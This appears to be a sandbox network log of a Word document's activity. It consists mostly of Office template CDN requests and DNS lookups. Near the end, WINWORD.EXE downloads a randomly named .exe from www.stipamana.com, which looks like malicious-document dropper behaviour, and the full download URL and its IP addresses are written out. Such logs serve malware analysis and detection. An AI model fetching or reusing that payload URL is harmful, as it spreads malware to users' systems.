Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 77d2d97b-f01e-00d8-5fc1-a3ad73000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887EFBA2F
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 56e459b1-f01e-010c-2097-a0e32f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03998158.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IaS3txYxwszaX7umN1Hw0g==
Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
ETag: 0x8D36AC8BD065412
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 620287b7-401e-00f2-3213-ba7263000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328940.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8883A8134
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bab20722-a01e-0046-4c1d-22b4c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328951.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8888436CF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f60ed86d-c01e-00fc-3b97-a05bd3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328972.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
ETag: 0x8D36AC888CEAFBE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 477f7fba-801e-00a0-169e-b90e8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328975.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
ETag: 0x8D36AC889183E51
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a209c062-f01e-003c-4097-a0a3ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328986.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC889AD573C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f2e243ab-801e-015b-4097-a04d1c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:44 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328983.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC88963C8B3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b450fbbe-c01e-00c3-7c97-a09370000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328990.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A1DF716
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345747501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
ETag: 0x8D60DDB967B9FA5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dacba5b7-401e-0105-2397-a08a43000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345749101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
ETag: 0x8D60DDC968C4F0E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02d4ae31-901e-0135-6fd0-ae1833000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:44 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345750301.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
Last-Modified: Wed, 29 Aug 2018 18:15:13 GMT
ETag: 0x8D60DDB5D624CF0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7adc3bba-701e-004d-4a96-8afe8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345751001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
ETag: 0x8D60DDB6BA6E455
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9ae00d4d-001e-0028-7797-a0eb82000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:44 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345749601.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
ETag: 0x8D60DDC2BE7DF3C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0414ccae-601e-0011-165a-b9109e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345751501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
ETag: 0x8D60DDC26100537
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6efd7f9e-101e-00b2-2f97-a0755b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7c59a99-101e-0021-318b-c7a43e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:44 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
ETag: 0x8D60DDB7EAA50F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4b5a1384-701e-0032-6dfb-b98a5d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:44 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC0007D57D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c3e299e4-301e-0068-0e2c-b46638000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403392501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
ETag: 0x8D60DDBA5EDDA1A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ef258b2c-c01e-001b-4d97-a016fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp1000111403.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 1OrACenntkuLABroK4EC+g==
Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
ETag: 0x8D5E78D3A9D8C97
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6910c7b5-e01e-00d4-5297-a03a7b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:44 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp1000111502.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
ETag: 0x8D5E78DC0BDFFD8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b597281b-e01e-00c0-4097-a0b22d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:8.8.8.8:53Request202.26.123.92.in-addr.arpaIN PTRResponse202.26.123.92.in-addr.arpaIN PTRa92-123-26-202deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request161.252.19.2.in-addr.arpaIN PTRResponse161.252.19.2.in-addr.arpaIN PTRa2-19-252-161deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestdns.stipamana.comIN AResponsedns.stipamana.comIN A87.120.121.160
-
Remote address:8.8.8.8:53Request160.121.120.87.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.42.69.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request92.12.20.2.in-addr.arpaIN PTRResponse92.12.20.2.in-addr.arpaIN PTRa2-20-12-92deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request30.243.111.52.in-addr.arpaIN PTRResponse
-
52.109.68.129:443https://roaming.officeapps.live.com/rs/RoamingSoapService.svctls, httpWINWORD.EXE1.8kB 8.2kB 12 11
HTTP Request
POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svcHTTP Response
200 -
94.156.167.57:443https://www.stipamana.com/tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exetls, httpWINWORD.EXE6.2kB 146.1kB 117 112
HTTP Request
GET https://www.stipamana.com/tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exeHTTP Response
200 -
88.221.134.137:80http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3DhttpWINWORD.EXE516 B 1.1kB 6 4
HTTP Request
GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3DHTTP Response
200 -
92.123.26.202:443https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2Ctls, httpWINWORD.EXE1.3kB 6.0kB 10 11
HTTP Request
GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2CHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cabtls, httpWINWORD.EXE2.6kB 54.4kB 37 45
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cabtls, httpWINWORD.EXE2.2kB 52.9kB 30 44
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cabtls, httpWINWORD.EXE2.1kB 27.8kB 26 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cabHTTP Response
200 -
